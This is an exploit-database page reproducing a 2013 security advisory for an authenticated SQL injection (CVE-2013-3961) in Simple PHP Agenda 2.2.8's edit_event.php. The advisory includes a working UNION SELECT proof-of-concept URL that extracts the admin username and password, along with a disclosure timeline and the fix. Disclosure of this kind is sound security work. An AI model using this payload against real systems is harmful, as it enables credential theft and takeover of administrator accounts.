Lucene search

K
exploitdbAnthony DubuissezEDB-ID:26136
HistoryJun 11, 2013 - 12:00 a.m.

Simple PHP Agenda 2.2.8 - 'edit_event.php?eventid' SQL Injection

2013-06-1100:00:00
Anthony Dubuissez
www.exploit-db.com
34

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

AI Score

6.7

Confidence

Low

EPSS

0.004

Percentile

74.3%

=============================================
WEBERA ALERT ADVISORY 02
- Discovered by: Anthony Dubuissez
- Severity: high
- CVE Request – 05/06/2013
- CVE Assign – 06/06/2013
- CVE Number – CVE-2013-3961
- Vendor notification – 06/06/2013
- Vendor reply – 10/06/2013
- Public disclosure – 11/06/2013
=============================================

I. VULNERABILITY β€”β€”β€”β€”β€”β€”β€”β€”-
iSQL in php-agenda <= 2.2.8

II. BACKGROUND β€”β€”β€”β€”β€”β€”β€”β€”-
Simple Php Agenda is Β« a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywere 
there’s internet Β».

III. DESCRIPTION β€”β€”β€”β€”β€”β€”β€”β€”-
Php-Agenda 2.2.8 and lower versions contain a flaw that allows an authenticated user iSQL attack. This flaw exists 
because the application does not properly sanitize parameters (only rely on mysql_real_escape_string() funcion ) in the 
edit_event.php file. This allows an attacker to create a specially crafted URL to dump multiple informations of the 
databases content.
A valid account is required.

IV. PROOF OF CONCEPT β€”β€”β€”β€”β€”β€”β€”β€”-
dumping login and password of the first admin
iSQL: 
http://server/edit_event.php?eventid=1%20union%20select%201,2,3,username,password,6,7,8,9%20from%20users%20where%20userlevel=9%20limit%200,1

V. BUSINESS IMPACT β€”β€”β€”β€”β€”β€”β€”β€”-
iSQL: We can get sensitive information with the vulnerabilities that can escalate to a complete administrator account.

VI. SYSTEMS AFFECTED β€”β€”β€”β€”β€”β€”β€”β€”-
Php-Agenda 2.2.8 and lower versions

VII. SOLUTION β€”β€”β€”β€”β€”β€”β€”β€”-
sanitize correctly the GET/POST parameter. (don’t rely on the mysql_real_escape_string() functions only…)

VIII. REFERENCES β€”β€”β€”β€”β€”β€”β€”β€”-
http://www.webera.fr/advisory-02-php-agenda-isql-exploit/

IX. CREDITS β€”β€”β€”β€”β€”β€”β€”β€”- 
the vulnerability has been discovered by Anthony Dubuissez (anthony (dot) dubuissez (at) webera (dot) fr).

X. DISCLOSURE TIMELINE β€”β€”β€”β€”β€”β€”β€”β€”-
June 05, 2013: Vulnerability acquired by Webera
June 06, 2013: Sent to vendor.
June 10, 2013: Reply of vendor, vendor release bugfix in version 2.2.9
June 11, 2013: Advisory published and sent to lists.

XI. LEGAL NOTICES β€”β€”β€”β€”β€”β€”β€”β€”-
The information contained within this advisory is supplied Β« as-is Β» with no warranties or guarantees of fitness of use 
or otherwise.Webera accepts no responsibility for any damage caused by the use or misuse of this information.

XII. FOLLOW US β€”β€”β€”β€”β€”β€”β€”β€”-
You can follow Webera, news and security advisories at:
On twitter : @erathemass

CVSS2

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

AI Score

6.7

Confidence

Low

EPSS

0.004

Percentile

74.3%